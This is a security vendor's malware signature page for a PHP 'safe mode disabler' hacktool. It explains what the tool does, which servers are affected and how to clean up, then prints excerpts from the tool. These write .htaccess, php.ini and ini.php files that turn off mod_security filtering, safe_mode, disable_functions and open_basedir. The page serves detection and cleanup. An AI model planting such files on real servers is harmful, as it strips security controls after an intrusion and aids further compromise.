Malware Signatures

  2. Home
  4. Malware Signatures
  6. php.hacktool.safemode-disabler.001

php.hacktool.safemode-disabler.001

PHP Safe Mode is an attempt to restrict certain system operations at a PHP level to ensure better security on shared server.
For example, in the safe mode, PHP processes can open/modify only file that belong to the user of the original PHP script. Launching external processes via exec() and system( ) functions is also prohibited.
It also imposes some restriction on uploading files. All this restriction make hacking (especially server-wide) quite difficult. That's why hackers try to disable safe mode if they managed to break into some site.
Once safe mode is disabled, they can use other malicious PHP tools off of that site.
Safe Mode disablers - is a category of script that try to disable PHP safe mode. They typically do it by createing .htaccess and php.ini files with corresponding rules.

Note: PHP Safe Mode breaks some popular legitimate script so many hosting providers turn it off by default. Moreover, PHP itself has depricated it as of PHP 5.3.0 and colpletely removed as of PHP 5.4.0.
Hosting providers should ensure security at a system level rather than rely on the PHP layer.

Affecting

Any servers with enabled PHP, especially with older versions of PHP.

Cleanup

Delete the malicious script and scan your server for other types of malware and specifically for backdoors. If your server security relies on the safe mode, make sure to find and delete all rules that disable it.
You can also sign up with us and let our team remove the malware for you.

Dump

... excerpts ...
...
<title>Safe Mode Fucker</title>
</head>
<body>
<center>
<form method="POST" action="">
<select name="way">
<option>All</option>
<option>php.ini</option>
<option>ini.php</option>
<option>htaccess</option>

...

function bypass_htaccess() {
$htaccess=fopen(getcwd().$slash."/.htaccess","w");
fwrite($htaccess,"
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
");

...

function bypass_php() {
$php=fopen(getcwd().$slash."/php.ini","w");
fwrite($php,"safe_mode = Off
disable_functions = NONE
safe_mode_gid = Off
open_basedir = Off");

...

function bypass_ini()
{
$ini=fopen(getcwd().$slash."/ini.php","w");
fwrite($ini,'<?
ini_restore("safe_mode");
ini_restore("open_basedir");
?>');